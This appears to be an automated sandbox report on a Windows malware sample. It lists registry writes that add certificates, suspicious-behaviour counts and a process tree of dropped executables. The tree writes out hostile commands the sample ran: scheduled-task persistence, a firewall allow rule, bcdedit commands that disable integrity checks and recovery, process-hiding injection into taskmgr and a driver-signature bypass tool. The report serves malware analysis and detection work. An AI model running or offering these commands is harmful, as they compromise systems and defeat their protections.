190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 Driver.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e4030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 patch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C 7E55.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 rty25.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec5290f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae474040000000100000010000000acb694a59c17e0d791529bb19706a6e420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 patch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C Driver.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 build2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a build2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 rty25.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2916 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2280 conhost.exe 2280 conhost.exe 2624 31839b57a4f11171d6abc8bbc4451ee4.exe 2700 31839b57a4f11171d6abc8bbc4451ee4.exe 2700 31839b57a4f11171d6abc8bbc4451ee4.exe 2700 31839b57a4f11171d6abc8bbc4451ee4.exe 2700 31839b57a4f11171d6abc8bbc4451ee4.exe 2700 31839b57a4f11171d6abc8bbc4451ee4.exe 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 2544 injector.exe 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 2544 injector.exe 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 2544 injector.exe 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 2544 injector.exe 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 484 Process not Found -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 2280 conhost.exe 3060 6816.exe -
Suspicious use of AdjustPrivilegeToken 18 IoCs
description pid Process Token: SeDebugPrivilege 2624 31839b57a4f11171d6abc8bbc4451ee4.exe Token: SeImpersonatePrivilege 2624 31839b57a4f11171d6abc8bbc4451ee4.exe Token: SeSystemEnvironmentPrivilege 1060 csrss.exe Token: SeSecurityPrivilege 308 sc.exe Token: SeSecurityPrivilege 308 sc.exe Token: SeShutdownPrivilege 1336 Explorer.EXE Token: SeShutdownPrivilege 1336 Explorer.EXE Token: SeShutdownPrivilege 1336 Explorer.EXE Token: SeShutdownPrivilege 1336 Explorer.EXE Token: SeDebugPrivilege 2432 conhost.exe Token: SeDebugPrivilege 2088 tasklist.exe Token: SeDebugPrivilege 2024 Driver.exe Token: SeDebugPrivilege 328 1C6F.exe Token: SeShutdownPrivilege 1584 explorer.exe Token: SeShutdownPrivilege 1584 explorer.exe Token: SeShutdownPrivilege 1584 explorer.exe Token: SeShutdownPrivilege 1584 explorer.exe Token: SeShutdownPrivilege 1584 explorer.exe -
Suspicious use of FindShellTrayWindow 14 IoCs
pid Process 1336 Explorer.EXE 1336 Explorer.EXE 1448 Looksmart.pif 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1448 Looksmart.pif 1448 Looksmart.pif 1336 Explorer.EXE 1336 Explorer.EXE 1584 explorer.exe 1584 explorer.exe 1584 explorer.exe -
Suspicious use of SendNotifyMessage 10 IoCs
pid Process 1336 Explorer.EXE 1336 Explorer.EXE 1448 Looksmart.pif 1448 Looksmart.pif 1448 Looksmart.pif 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1336 Explorer.EXE 1584 explorer.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2572 BroomSetup.exe 328 1C6F.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2240 wrote to memory of 2408 2240 cmd.exe 28 PID 2240 wrote to memory of 2408 2240 cmd.exe 28 PID 2240 wrote to memory of 2408 2240 cmd.exe 28 PID 2240 wrote to memory of 2408 2240 cmd.exe 28 PID 2240 wrote to memory of 2408 2240 cmd.exe 28 PID 2240 wrote to memory of 2408 2240 cmd.exe 28 PID 2240 wrote to memory of 2408 2240 cmd.exe 28 PID 2240 wrote to memory of 2280 2240 conhost.exe 76 PID 2240 wrote to memory of 2280 2240 conhost.exe 76 PID 2240 wrote to memory of 2280 2240 conhost.exe 76 PID 2240 wrote to memory of 2280 2240 conhost.exe 76 PID 2240 wrote to memory of 2624 2240 conhost.exe 29 PID 2240 wrote to memory of 2624 2240 conhost.exe 29 PID 2240 wrote to memory of 2624 2240 conhost.exe 29 PID 2240 wrote to memory of 2624 2240 conhost.exe 29 PID 2240 wrote to memory of 2744 2240 conhost.exe 35 PID 2240 wrote to memory of 2744 2240 conhost.exe 35 PID 2240 wrote to memory of 2744 2240 conhost.exe 35 PID 2240 wrote to memory of 2744 2240 conhost.exe 35 PID 2408 wrote to memory of 2572 2408 InstallSetup7.exe 34 PID 2408 wrote to memory of 2572 2408 InstallSetup7.exe 34 PID 2408 wrote to memory of 2572 2408 InstallSetup7.exe 34 PID 2408 wrote to memory of 2572 2408 InstallSetup7.exe 34 PID 2408 wrote to memory of 2572 2408 InstallSetup7.exe 34 PID 2408 wrote to memory of 2572 2408 InstallSetup7.exe 34 PID 2408 wrote to memory of 2572 2408 InstallSetup7.exe 34 PID 2572 wrote to memory of 2860 2572 BroomSetup.exe 98 PID 2572 wrote to memory of 2860 2572 BroomSetup.exe 98 PID 2572 wrote to memory of 2860 2572 BroomSetup.exe 98 PID 2572 wrote to memory of 2860 2572 BroomSetup.exe 98 PID 2860 wrote to memory of 2912 2860 windefender.exe 42 PID 2860 wrote to memory of 2912 2860 windefender.exe 42 PID 2860 wrote to memory of 2912 2860 windefender.exe 42 PID 2860 wrote to memory of 2912 2860 windefender.exe 42 PID 2860 wrote to memory of 2696 2860 windefender.exe 126 PID 2860 wrote to memory of 2696 2860 windefender.exe 126 PID 2860 wrote to memory of 2696 2860 windefender.exe 126 PID 2860 wrote to memory of 2696 2860 windefender.exe 126 PID 2700 wrote to memory of 2116 2700 31839b57a4f11171d6abc8bbc4451ee4.exe 44 PID 2700 wrote to memory of 2116 2700 31839b57a4f11171d6abc8bbc4451ee4.exe 44 PID 2700 wrote to memory of 2116 2700 31839b57a4f11171d6abc8bbc4451ee4.exe 44 PID 2700 wrote to memory of 2116 2700 31839b57a4f11171d6abc8bbc4451ee4.exe 44 PID 2116 wrote to memory of 592 2116 cmd.exe 45 PID 2116 wrote to memory of 592 2116 cmd.exe 45 PID 2116 wrote to memory of 592 2116 cmd.exe 45 PID 2700 wrote to memory of 1060 2700 31839b57a4f11171d6abc8bbc4451ee4.exe 46 PID 2700 wrote to memory of 1060 2700 31839b57a4f11171d6abc8bbc4451ee4.exe 46 PID 2700 wrote to memory of 1060 2700 31839b57a4f11171d6abc8bbc4451ee4.exe 46 PID 2700 wrote to memory of 1060 2700 31839b57a4f11171d6abc8bbc4451ee4.exe 46 PID 1060 wrote to memory of 2544 1060 csrss.exe 54 PID 1060 wrote to memory of 2544 1060 csrss.exe 54 PID 1060 wrote to memory of 2544 1060 csrss.exe 54 PID 1060 wrote to memory of 2544 1060 csrss.exe 54 PID 1336 wrote to memory of 3060 1336 Explorer.EXE 55 PID 1336 wrote to memory of 3060 1336 Explorer.EXE 55 PID 1336 wrote to memory of 3060 1336 Explorer.EXE 55 PID 1336 wrote to memory of 3060 1336 Explorer.EXE 55 PID 2564 wrote to memory of 1088 2564 patch.exe 87 PID 2564 wrote to memory of 1088 2564 patch.exe 87 PID 2564 wrote to memory of 1088 2564 patch.exe 87 PID 2564 wrote to memory of 2060 2564 patch.exe 85 PID 2564 wrote to memory of 2060 2564 patch.exe 85 PID 2564 wrote to memory of 2060 2564 patch.exe 85 PID 2564 wrote to memory of 2424 2564 patch.exe 127 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1336 -
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"2⤵PID:2240
-
C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe"C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exeC:\Users\Admin\AppData\Local\Temp\BroomSetup.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "5⤵PID:2860
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F6⤵
- Creates scheduled task(s)
PID:2696
-
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵PID:2912
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsy1613.tmpC:\Users\Admin\AppData\Local\Temp\nsy1613.tmp4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:1888 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nsy1613.tmp" & del "C:\ProgramData\*.dll"" & exit5⤵PID:536
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2624 -
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:592
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Manipulates WinMon driver.
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1060 -
C:\Windows\system32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:1720
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:7⤵
- Modifies boot configuration data using bcdedit
PID:2424
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 07⤵
- Modifies boot configuration data using bcdedit
PID:2148
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}7⤵
- Modifies boot configuration data using bcdedit
PID:1844
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast7⤵
- Modifies boot configuration data using bcdedit
PID:1612
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}7⤵
- Modifies boot configuration data using bcdedit
PID:2892
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 17⤵
- Modifies boot configuration data using bcdedit
PID:2244
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn7⤵
- Modifies boot configuration data using bcdedit
PID:904
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 07⤵
- Modifies boot configuration data using bcdedit
PID:320
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe7⤵
- Modifies boot configuration data using bcdedit
PID:3012
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe7⤵
- Modifies boot configuration data using bcdedit
PID:2284
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows7⤵
- Modifies boot configuration data using bcdedit
PID:2852
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:7⤵
- Modifies boot configuration data using bcdedit
PID:2060
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER7⤵
- Modifies boot configuration data using bcdedit
PID:1088
-
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:3004
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2544
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe6⤵PID:2432
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v6⤵
- Modifies boot configuration data using bcdedit
PID:2644
-
-
